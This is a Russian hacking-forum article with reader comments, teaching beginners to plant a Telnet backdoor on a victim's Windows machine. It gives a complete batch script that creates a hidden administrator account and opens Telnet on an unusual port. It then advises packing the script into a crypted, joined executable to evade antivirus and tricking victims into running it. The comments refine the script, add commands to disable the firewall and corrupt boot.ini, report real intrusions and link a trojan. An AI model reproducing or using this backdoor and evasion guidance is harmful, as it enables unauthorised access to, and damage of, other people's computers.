взлом через TELNET — HackZona.Ru

взлом через TELNET

взлом через TELNET

Тип статьи:
Со старой ХакЗоны.
Источник:
Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.

Телнет — сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается «ручками», мыши отдыхают, только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у «врага», но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.
Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

все это пишешь в блокноте, и сохраняем как *.bat

Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del — удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add — не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
«hacker»=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM, редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.

теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.

Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает
консольное черное окно, говорящее о выполняемых процессах в командной строке. Но
не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler ifolder.ru/7197807. Она
компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник
превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.
Вроде готово… Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб). Они помогут тебе склеить файлы в один и изменить
сигнатуру дабы не палится антивирусами.
Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы
тебе осталось только подключится к телнету через указанный тобой порт. Бывает
так что жертва находится в глобальной сети www у которой IP динамический, в этом
случаи, зная диапазон IP его провайдера можно просканировать эту сеть на
открытый наш редко используемый 972 Порт. А чтобы знать когда твой «друг»
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключится. Для этого можешь выбрать стандартный виндосовский
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды...
Можно к примеру расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f — который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)

Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.

P.S. На все непонятные термины и выражения есть Гугл.

Внимание!!! Данная статья — это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности
Нравится
Не нравится

155 комментариев

01:04
боян...
01:06
Статья написано для новичков супер (и не только для новичков) автору +1
01:21
_support_ ты сам боян ( мог бы зависть не показать )) лучше написал бы сам что нить а не тупо так поступить, даже комментировать нечего у тебя значит даже не понял что написано мл***ь
03:46
Хорошая статья
15:10
Для первой статьи очень даже неплохо, поздравляю. Есть грамматические ошибки канеш, но вцелом.. неплохо для новичков))
16:09
Спасибо за статью)
21:25
Полезно! +5, спасибо!
23:47
Обьясните как и куда импортировать какой-то файл.
Ибо после статьи телнет---это ДЕЛО=)))
В ЛС плиз
06:26
Боян не боян но очередной раз почитать про телнет интересно. Статья нормальная.
10:09
Да, бэкдор своими руками это круто. Так держать гиви!
19:30
Статья отличная понятно все , освоил , только возникла одна проблема , при вводе login: hacker
password : (hack) клава или что то еще отказывается работать и что либо печатать , если кто знает в чем проблема пожалуйста отпишитесь тут или на мыло [email protected] заранее блогадарен . Автору RESPECT!
21:12
jetto11, не обращай внимание что у тебя не отображается пасс на мониторе. На самом деле он прекрасно вводится, но не виден. Введи его и нажми enter)))
02:35
GivioN я пробывал типшет тип неверный пароль или имя пользователя , я вот думаю без пароля мб легче будет или без него не как?

02:43
пишет "Вход в систему не произведен , имя и пароль неопознаны" Да и я все сделал без джойнеров и крипторов ...
04:55
Статья хорошая, давно в своих целях использую telnet и с увереностью гаварю что статья зделана на 5
11:00
jeffo11, возможно проблема с кодировкой. Попробуй вместо буквы "с" в этих словах вводить русскую "с"... Или даже лучше пропиши логин и пасс цифрами. Например, 12345 и 1234
18:42
ага спс поду попробую )
20:18
все получилось , спс большое пароль цыфрами рулет )) IT is great !
04:52
Сделал всё как написано, только без джойнера и без криптора! Пароль сделал цыфрами! При попытке зайти пишет! Login incorrect! Как с эти бороться!?
18:24
Ни чего так, мне было интереснее узнать о компиляторах пакетных файлах. Как-нибудь выложу исходники одной очень интересной проги на Delphi, делает почти то же, что и этот пакетный файл, только в процессах не светится, форма не загружается и тп... И кстати GUI это графический интерфейс, а в ТелНете я графики не заметил пока что...))
20:02
Zontrnd - поймали на слове ) Ждём исходников

MyXa_CbIkaTyXa - сложно вам так сказать что и чего... Мало инфы ) выб в личку или на форуме отписались бы )

GivioN - Респект... +1 )
22:59
что делать если выдает "не удалось открыть подключение к этому узлу,на порт 740. СБОЙ ПОДКЛЮЧЕНИЯ"?
02:04
angusy, возможно этот порт на тачке у жертвы не открыт. Есть следующие причины этой проблемы:
1) ошибочное написание тела батника. Проверь ещё раз его.
2) возможно этот порт уже занят другим приложением, и телнет не может его сбросить.
3) есть версия что у жертвы стоит фаервол который не даёт батнику повесить телнет на этот порт. Поэтому в этом случае можешь попробовать прописать в батнике часто используемые порты:21, 25, 110,80(при 80 возможно запретишь выход жертвы в инет) т.к. в фаерволе по дефолту на них исключение.
А узнать какие порты открыты у жертвы тебе помогут известные сканеры сети и безопамности, такие как XSpider или Essential NetTools(ИМХО - лучшие)))
P.S Как я понял, я многое упустил в этой статье...Наверно))
15:13
Просто я нашёл чела по локалке у которого в папку можно кидать что угодно. Ну естественно я написал bat файл потом превратил его в exe. Дальше скриптором(правда другим) провел процедуру "антипалилки". Нажав случайно кнопку тест слава Богу для компа моего не фига не случилось(хотя окошко чёрное консоли открылось и тут же исчезло). Ну дальше добавил иконку ico "Counter Strike". Теперь жду пока жертва наша откроет файлик.
to Givion:Что-то не работает команда "tlntadmn config port=972
sec=-NTLM". Может что б к жертве подключиться надо включит функцию Телнет у себя? Если да то как?
19:34
Вся эта замута будет работать только на прямых айпи или в локалке?
15:55
мля надо прописывать прямое айпи чела к кому подключаешься , про локальное можешь забыть )
05:31
Отличная статья!!!!!!!!!!!!!
toi
03:12
у мя не получаеца hacker из привецтвия убрать (
toi
21:59
Великая весчь! Спс GivioN'у!!!
14:02
зачем удалять SUPPORT_388945a0 ?
16:09
можно по другому добавить запись в реестр, вот полный исходник батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user support tebehana /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0
y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
23:35
все получилось , спс большое
19:33
Простите, а куда нужно прописывать текст, который меняет видимость нового админа на компе? - в новый файл, или в тот же который *.bat? Я сделал как посоветовал Magnificent, и прописал в *.bat, и при перезагрузке компа новый админ был виден.
03:58
да статья супер , респект автору
03:59
да статья супер , респект автору
19:01
А как узнать IP жертвы?
21:13
РЕСПЕКТ хорошая статья - первый взлом который получила :)
07:32
Еще не мешало бы виндовский брандмауэр закрыть:

net stop sharedaccess
sc config sharedaccess start= disabled
22:18
спасиба за статью! надо будет заценить её на деле.
23:46
Полесзная статейка. ЗачОт!!
12:52
у меня по этому адресу в реестре ниче нет [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]

NTCurrentVersion - у меня название другое : CurrentVersion, а винлогон и подавно нету....это может помешать или все делать так как написано?
13:11
Автор этого текста походу дела чета напортачил
Короче для того чтобы скрыть профиль нужно ввести нижеприведенный текст...это дла ХР...для других операционнок возможно будет немного подругому

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000

13:28
ой ))
там где написано Windows NT нужен пробел)
23:28
Статья супер!Респект аФФтору!!!!
20:44
аффтору респект одназначно, все работает))
13:06
Не удается отключить админа в welcome screen'е
14:04
Все получилось немного ступил блин))

вот как правильно

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000
22:19
и кто просил меня на него нажимать(((
00:45
Знаешь классно написал -- вот бы написал еще о том как снифером пароль от telnet угнать - было б ваще шикарно, попробовал это у нас в локалке ггг
13:56
почему все равно порт 972 остается недоступен???
21:00
сорри за туповатый вопрос, вот эту часть

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000
нужно вставлять в бат файл или создавать отдельно регом??? если регом то как?
19:21
Очень все доходчиво. Спасибо автору! Отдельное спасибо за то, что батник расписал :-)
01:58
у меня под названием *.bit не сохраняет
21:53
дурак не бит а .bat
22:37
когда пытаюсь переделать в *.exe QuickBatchFileCompiler выдает System Error. Code: 5
Отказано в доступе
что делать подскажите?
01:57
"бери в руки джойнеры и крипторы" или можно SFX-архив сделать вместе с адским батником отправить жертве еще пачу вирусника :) а выглядеть это будет как простая установка программы,которая правда дерьма зальет на комп жертве
02:00
да вообщем ламеров то дофига можно и не использовать QuickBatchFileCompiler
20:04
Извините у меня никак не получается ! помогите ! плиз..
1- как убрать админа HAcker
2- ну получается подключится к жертве пишет "Не удалось открыть подключение к этому узлу, на порт 972: Сбой подключения "
Помогите плиз
02:28
хорошая статья! :)
13:46
А как обратно закрыть порт,так же,через бат-файл?
19:34
народ а что с config.reg?
я пробовал скрипт, но в велкоме запись не исчезала(
напишите пожалуста скрипт полностью, или скажате чё делать
05:53
на висте, как я понял, это не прокатит?
15:52
А нельзя ли этот скрипт реестра сразу вбатку прописать?
20:53
для тех у кого мура с пользователями не решилась Гивион слегка знаки по перепутал, а точнее не раставил я код переделал получилось такое:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList]
"hacker"=dword:00000000
и не забудьте что, то что выделено в [ ] надо чтобы было в одной строчке
22:47
Вообще реально взломать этот сайт???
21:11
http://ifolder.ru/7197872
А почему тут вирус?
06:50
Подскажите в telnete пишет сбой подключения
17:42
2 Korovka
Все что создал человек можно взломать --- идеальной защиты не существует.
16:29
212.62.124.102 привет всем подскажите пароль на вот этот айпишник немагу некак войти в доступ к нему
00:34
рег файл надо клеить к батнику??
15:45
рег файлу надо дать имя учетной записи
14:37
рег файл не нужно прикреплять в файлу ехе. просто поместить в ту же папку в которой находится откомпиллированный батник
15:12
COOL СТАТЬЯ.:)
15:55
Да все ок получается ток проблема то что приходится этот файл отправлять жертве и вдалбливать чтоб он его запустил в переводе ты спалилися.))
19:13
А подскажите пожалуста как открыть порт???
19:32
при запуске телнета он сам открывает порт на который настроен
22:17
а как юзать ftp????
Hai
23:39
Какой программой можно сканировать портов 972 Провайдера?
09:48
вместо рег файла! :)
вместо строки regedit /s conf.reg
пропишите reg add "hklmsoftwaremicrosoftwindows NTcurrentversionwinlogonspecialaccountsuserlist" /v tentek /t REG_DWORD /d 0 и все готово.
жертва даже не узнает о существовании учетки!
09:49
Сори там вместо tentek припишите hacker

19:26
tentek! все охрененно и здорово на статье, но видать немного или ты не то написал или я прогнал. сканер портов порт 23 обнаруживает а 972 нет. и я не пойму почему... напиши мне в асю 475-766-557.
03:00
такой вопрос, как копирануть именно на свой комп?
03:59
У меня чото неполучается с клучом,непонятно написал както
04:24
Я молехо непойму с ключом реестра,чот там нето,проверал видно учотку соровно,как ету команду неизменял,неполучается,подскажите или точнее напишите пожалуста
04:41
Ура... я разобрался с етим ключом....ето выгледит так:
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
04:43
вижу когда копирушь суда текст меняется снова попробую
....reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0
04:46
блин де палочки зделаем так место палочки наискас поставим звездочку =*
reg add "HKEY_LOCAL_MACHINE*SOFTWARE*Microsoft*Windows NT*CurrentVersion*Winlogon*SpecialAccounts*UserList" /v hacker /t REG_DWORD /d 0
место звездочек поставте палочки и всё получится ))
01:39
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]по конкретней можно >о что значит? как именно писать через пробел IP и порт??? Вставляем код,Какой именно код подскажите плзззззз!
01:47
запускается и сразу исчезает почему ????
01:50
222,98,62,169 порт 23 немогу зайти хотя пишит незащещён протокол!
Hai
18:21
Не получается! hacker не скрывается учетка!!!
16:37
GivioN, ты просто МАЛаДЕТС!!! Пусть некоторые говорят, что, мол, батниками и телнетом взламывают только ламо, но я утверждаю - на низком уровне всё гораздо проще и круче! Давненько думал о таком виде взлома, нехватало чавото ф голове сопоставить именно телнет с батником! Жду исчо статей!!!
19:41
У меня не водиться пароль что делать????
14:12
Ребята кто понял как пользоваться напишите плиз в аську
395-526-899
20:26
Люди помогите , я пытаюсь хакнуть комп с помощью radmina и xspider , все вроде получается , но radmin пароль просит , я не знаю че делать подскажите ?!
02:23
я конец не понял как работать с этим:
"... Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб) . ..."
стучите в асю:
381225061
02:26
все, я понял(правой кнопкой мыши надо нажимать на Archivo)
16:52
теперь я не понял что и как делать тут:
"...Так как при создании нового админа он будет виден в welcome screen'е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"hacker"=dword:00000000..."
помогиите, ася 381225061
20:18
статья по 5 бальной шкале тянет на все 10!!!!!!очень хорошо!!!Всё ясно....не ну были кой какие проблемы,но в етом помог ГУГЛ)))))
13:35
o - это значит "open" (открыть)
между ip и портом нужен пробел
21:04
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
запустил батник на своем компе , появилась учетка , я её удалил))), надеюсь мой камп теперь не доступен через телнет?(((
22:19
У меня проблемка, в телнете логин пишется, а пасс нет...вообще пасс не могу вписать....
12:34
Если автор не против я добавлю немного редактированный вариант (одним файлом) чтослудов не оставлять :)
19:19
ето конечно всё, прикольно, но...как сделать шоб ЕХЕшник не палился в Диспетчере Задач, а вот по поводу, вирусов в прогах "рекомендуемых" я согланен, как-не прикольно когда у тя шарится троян в компе)))))....и де искать, после того как мы проверили ЕХЕшник, файл который он создал??

пиши в ЛС
23:31
Да все он там вводится, только вместо того чтобы забивать пасс звездочками при вводе, он вообще не отображается. А еще лучше использовать Putty http://soft.softodrom.ru/scr/get.php?id=5035 там и ssh-клиент и telnen-клиент. Вообщем этот инструментарий подойдет всем.
З.Ы. Подключался на адсл-модем, по дефолту там стоит
login: root
password: Admin
так что пробуйте
23:56
блин нифика не получаеться!!!
всё сдела на отлично но при подклбчении порт говрит плохой!!!!
19:24
мне тоже пишет порт неправильный
11:59
я понял порт нужно использовать меншьше 1024
09:05
конектюсь через телнет зная логин и пасс жертвы без проблем ! а по фтп не конектится хоть убей( пробовал на 10 компах одна и таже история!
когда вбиваю команду >ftp open "тут свой ip" выдает такую строку
ftp> connect :Неизвестный код ошибки

И еще такая проблема когда я проверяю свой ип через командную строку "ipconfig/all у меня такой ип 192.168.1.4 ,
а через любой сайт проверки айпишника выдает 92.127.11.9
первый ип 192.168.1.4 я так понял это ип модема?
вобщем когда пытаюсь подканектится по ftp через телнет пробую вбивать и первый ип и второй и вобоих случаях выдаед ошибку! может дело в модеме или настройках винды либо это вобще провайдер глючный? подскажите кто знает
04:22
Я впарил так: предложил скинуть несколько программ-приколов. Юзер согласился, я создал SFX архив с приколами и батником внутри. В настройках SFX указал на выполнение батника после распаковки, а в него самого добавил в начало строку
@echo off
Проверил у себя ком строка появляется на доли секунды и исчезает, не шаришь не поймешь!
И АВП побоку, и юзер доволен, и я в его компе как дома :)))
04:26
blacklnk, 92.127.11.9 это твой внешний IP, адрес сервера провайдера, а 192.168.1.4 локальный, в сети твоего провайдера.
00:02
я тока сегодня зарегался на сайте и уже увел пароль от инета !!!!!!!!!!!!!!!!!!!!!!!!!
20:07
я вставил код в cmd, но них*я не появилось, учетки новой тоже нет. ко мне можно сейчас подключиться через telnet?
23:03
все, получилось. спс за статью)
17:35
Интересно конешно это всё. Но как подрубится по телнету к юзеру если его комп находится ЗА серваком провайдера???
08:09
хм, я через радмин кинул тупо батник в систему, попробовал его запустить через телнет. просканил на порты, и нету дыры=(
19:54
Подскажите пожалуйста как поднять ftp сервер и залить радмина через telnet для более удобного удаленного
администрирования, только чтобы жертва невидела у себя на компе радмина...(объяснтие детально, я новичёк...)
13:14
Нужен хэлп.!! помогите получить рут на серванте (скан показал 21(ftp),23(telnet),80(www-http),8080(http-proxy фаервол )) ... пробовал телнетиться - Welcome Dreambox - kernel2.6.9 по сути *nix, просит login(я пробовал брутусAet2 - не получается) и pass (точно рут).... пробовал потушить сервант ServerKiller-ом(byLogger) по 80,8080,21,23 портам -- !! получилось вывести из строя на две минуты.... а теперь атаки ServerKiller(byLogger) нифига не дают..... дело в том, что этот сервант одного чела, которому наша фирма помогает раздавать нтв ключи через UTP НАШАРУ, но с условием: что он не продаёт инет никому... этот хер конектит всех, кому не лень к нету... отрезать провода пока нельзя,но в будущем неизбежно!!! помогите получить рут....
13:16
Последние 15 Комментариев к Статье
Нужен хэлп.!! помогите получить рут на серванте (скан показал 21(ftp),23(telnet),80(www-http),8080(http-proxy фаервол )) ... пробовал телнетиться - Welcome Dreambox - kernel2.6.9 по сути *nix, просит login(я пробовал брутусAet2 - не получается) и pass (точно рут).... пробовал потушить сервант ServerKiller-ом(byLogger) по 80,8080,21,23 портам -- !! получилось вывести из строя на две минуты.... а теперь атаки ServerKiller(byLogger) нифига не дают


17:15
привет всем,всё получается,но когда нужно вводить пароль то ни каких вводов комп вообще не делает.подскажите что это и как быть
05:03
а каким образом можно узнать ip адрес жертвы???,Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[ IP ЖЕРТВЫ? ] 972[порт]
05:06
как можно узнать IP АДРЕС ЖЕРТВЫ????
17:13
Нужен help!
Как удалить какие либо папки с С диска,чтоб с батника одной командой удалял, без вот этого: c:WINDOWS*, Продолжить [Y(да)/N(нет)]? ЧТОБ БЕЗ ЭТОГО УДАЛИЛА
02:46
Что-то у меня не получается( даже у себя на компе не получается через этот батник telnet запустить( и порт открыть тоже...
16:53
Кто как думает???
С какой винды лучше взламывать???

13:40
Кот знает, или слышал такое:
Существует команда, толи прога в виде консоли. Её действие заключается в следующим: Вообщем стандартное соединение проходит обменом 16 пакетов с серваком, а вот если мы отправим на этот сервак 1000 пакетов он пависнит на 100% повиснит, И вот тогда можно зайти на сервак с 23 "стандартного" порта!!! Так вот эта команда, толи прога в виде консоли, такое мутит. Кто знает об этом добавьте высказывание...
13:46
При входи на сервак с консоли, ход ввода логина она покажет! А вот пароля она не когда не покажет вам... Потому что это системная конфиденциальная информация, пароль ВВОДИТЬСЯ, ещё раз повторяю он вводится, но не отображается, "дабы не спалиться"...
20:15
Круто))))но я ступил и случайно запустил его())) короче реально работает(*_*)
17:18
Статья хорошая, телнет запускается. Но касперский начинает визжать. Батник превожу в экзешник, соединяю с другими файлами, шифрую криптором - всё равно визжит. Поэтому вероятность взлома уменьшается. Наверное криптор новее нужен. Но можно впарить тому, у кого антивирус не обновлённый. В общем в статье всё доступно и понятно изложено. Спасибо автору!
12:29
прикольно я поробую
15:13
Здраствуйте участники портала помогите плиз все вышесказанное попробовал вставить себе на комп имеею ввиду .bat и .reg файл предварительно закомпилировав это чудо в .exe файл все ок... с учетом одного welcome screen'е все равно выходит при загрузке винды....у меня xp sp3
09:10
Проверь строку с файлом реестра, где то там ошибка у меня все сработало, но я фаил реестра писал во втором бантике.

04:29
Всем приф=)).. Нард помогите у меня вообще что то не чего не получается(((( Если кто сможет объясните мине по подробней что и как делать.... Буду очень благодарен)) Я не знаю какая оперативная система нужна для него... у меня vista.
20:12
ПОМОГИТЕ мне пожалуйста, вообщем я по телнету на удалёный комп зашёл, только вот какой командой убить (удалить) BOOT.INI загрузчик винды, пожалуйста подскажите
*================================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================================
C: и вот тут я незнаю как BOOT.INI удалить!!!
ПОЖАЛУЙСТА, КОМУ НЕ ЛЕНЬ ПОМОГИТЕ, ПРОПИШИТЕ...
19:59
Удалить Boot.ini нельзя но можно испортить
Вот таким образом:
bootcfg /delete /id 1 >nul
04:31
ааа мыло забыл [email protected]
22:48
ЛЮДИ , ПОМОГИТЕ ! та же хрень что и у KingSD !!!
ЛОгин вводится, а при наборе пароля ввод не идёт !!!
Кто знает, в чём дело ? Оп. система- Windows XP
18:52
а через телнет можно скачивать файлы у жертвы!?
00:01
напишите подробнее как руками все сделать в телнете если доступ уже есть соединение произошло но оно не долго длиться!!! порт 110 логин и пароль не просит дальше действия???
01:09
+1, А нубы могут поставить графическую оболочку чтобы пальцы не стирать.
13:37
Интересно !!!
А есть программа, чтобы защититься от этого? Подозреваю, что со мной так и обстоит. Я совершеннейший чайник, не могу избавиться от лазутчика, который ставит мне программы, заделался параллельно админом, вытворяет, что пожелает...даже внедрил программу ДОС.....Можно ли по его следам , обнаруженным у меня пойти по его следу и внедриться к нему?
21:54
Пацаны кидайте bat по асе! В картинке !
15:10
Хорошая штука! Очень хорошо помогла мне! ;-)
00:53
я както залез через телнет, а там меню настроек модема "Зухель".... можно только по нему туда-суда... подскажите че бы потом можно сделать??
01:59
было бы неплохо к статье прикрепить список команд для cmd.exe я думаю не все знают команды
23:51
Помогите кто знает,есть один интернет клуб в которой стоит система OSG_Shell. Эта х'''ь идет как shell оболочка. После того как кончаются деньги то включается автоматом оболочка. После есть доступ в пуск но при включения например эксплорера он закрывается за этот шел заставку и я думаю может есть прога какая нибудь которая не давала бы сворачиваться.В общем, есть доступ на диски с: На диске я нашел папку с названием Shell в этой папке есть разные bat файлы к которым изменение или удалнние нет доступа. НО я понил что если удалить папку шелл или изменить в ней файлы то будет доступ практически ко всему У кого есть мысли по моему вопросу то пожалуйста пишите или на этот форум или мне на мыло: [email protected] СРОЧНО: то что я перепробовал не работало.
12:45
Спасибо большое за статью!
Но есть вопрос: где взять боьше команд для telneta именно по управлению компом??
19:50
да всё круто, только надо учётку делать скрытой! ещё вопросы...
1) как сделать, чтобы батник не показывал окно?
2) что делать, если пароль не вводится? вот тупо кнопку давишь, а он не вписывается (telnet.exe менял а толку нет)
09:12
Новый троян АНТИ ЛАМЕР управление чужим компом качаем и радуемся тока просьба не проверять на вирус
тотал!!!чтоб не попал в базу антивирусов!!!

http://lokalhost1.webservis.ru/ALB.zip
13:25
Батник слишком палевный
chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
..........................................................................
04:35
1 - кодировки 1251 в таблице chcp не существует, максимум 866.
2 - учетной записи SUPPORT_388945a0 в ХР не существует, да и не зачем её удалять.
3 - нельзя добавится в группу админов так как кодировка не подходит.
4 - нельзя удалить встроенную учетку Пользователей.
5 - regedit вызывает редактор реестра, а при слиянии с conf.reg обязательно выскочит окно на подтверждение.
6 - проще на этом месте прописать reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v hacker /t REG_DWORD /d 0x00000000 /f
и это сработает.
7 - нельзя запустить телнет командой net start telnet если он отключен в службах.

05:11
в начале батника нужно прописать chcp 866 ? тогда можно будет присоединиться к админской группе, иначе телнет не подключит к пользовательской учётке.
00:23
ну или chcp 1251
00:25
в зависимости от системы
03:10
спасибо за статью